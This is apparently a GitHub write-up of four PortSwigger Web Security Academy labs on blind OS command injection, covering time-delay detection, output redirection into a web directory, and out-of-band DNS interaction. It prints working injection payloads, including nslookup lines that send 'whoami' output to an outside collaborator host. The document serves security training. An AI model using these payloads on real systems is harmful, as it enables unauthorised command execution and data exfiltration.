portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups Detailed, categorized solutions for every lab — from APPRENTICE to EXPERT — covering all 30 vulnerability types.

View on GitHub

Labs Covered

This write-up focuses on the following PRACTITIONER-level labs from the PortSwigger Web Security Academy:

2 Blind OS command injection with time delays

This lab demonstrates how an attacker can use time-based techniques to detect the success of command injection when no output is returned to the browser.

3 Blind OS command injection with output redirection

This lab shows how attackers can redirect command output to a location they can retrieve later, enabling them to exfiltrate data even if no output is returned in the HTTP response.

4 Blind OS command injection with out-of-band interaction

This lab demonstrates how attackers can use out-of-band channels, such as DNS queries, to receive feedback about whether command injection was successful.

5 Blind OS command injection with out-of-band data exfiltration

This lab builds on out-of-band interaction by showing how attackers can exfiltrate actual data through external DNS queries or other protocols.

LAB 2 - Blind OS command injection with time delays

Lab Description :

image

Solution :

There is a function to submit feedback:

image

Identify if one of the following parameters are vulnerable to non-Blind Command Injection: Parameters: name, email, subject, and message


|whoami
&whoami

-> payloads don’t work in this case.

  1. Now, try to test the said parameters in Blind OS Command Injection

||ping -c 10 127.0.0.1||

Or

The vulnerability affects the fields “Name”, “Email” and “Message”:

"; ping -c 127.0.0.1; echo "a

image

By adding the ` & sleep # ` (Note the space before & and after #) / ` & sleep 10 & (URL-encode before sending) , we can see that the email` parameter is vulnerable to command injection vulnerability, since there was time delay of 10 seconds.

By ‘#’ we comment out the rest of the query. Since it is a bash script that is running in the background

REQUEST

image

RESPONSE

image

LAB 3 - Blind OS command injection with output redirection

Lab Description :

image

Solution :

There is a functionality for submitting feedback:

image

And the images are retrieved with a GET request.

image

We need to execute:

whoami > /var/www/images/whoami.txt

I sent the POST request to intruder and set 3 fields to attack in Sniper mode:

image

Then I added 3 payloads:

image

When we add payloads to the field subject the website returns an error:

image

To test output redirection in the email parameter missed during the intruder attack, we inject a command like whoami > /var/www/images/whoami via the URL parameter. A 200 OK response when we send request confirms the file was created .

image

Access the file

We get the username “peter-5fYwD0” after a GET to “/image?filename=whoami”, so the above payload has worked:

image

Response

image

LAB 4 - Blind OS command injection with out-of-band interaction

Lab Description :

image

Overview

image

Solution :

There is a function to submit feedback:

image

In this case the command injection is achieved with the payload: nslookup 7s0qd0oqa0r71b9pewc0nu7a41asynmc.oastify.com

image

We get reponse in burp

image

LAB 5 - Blind OS command injection with out-of-band data exfiltration

Lab Description :

image

Solution :

There is a function to submit feedback. It allows out-of-band interaction with the payload:

$(nslookup juh2fcq2cctj3nb1g8ecp69m6dc400op.oastify.com)

We get the username (“peter-0B6BNY”) using the below payload which will execute whoami command:

$(nslookup'whoami'.m1o5mfx5jf0maqi4nblfw9gpdgj774vt.oastify.com)

image

We get response on burpsuite.

image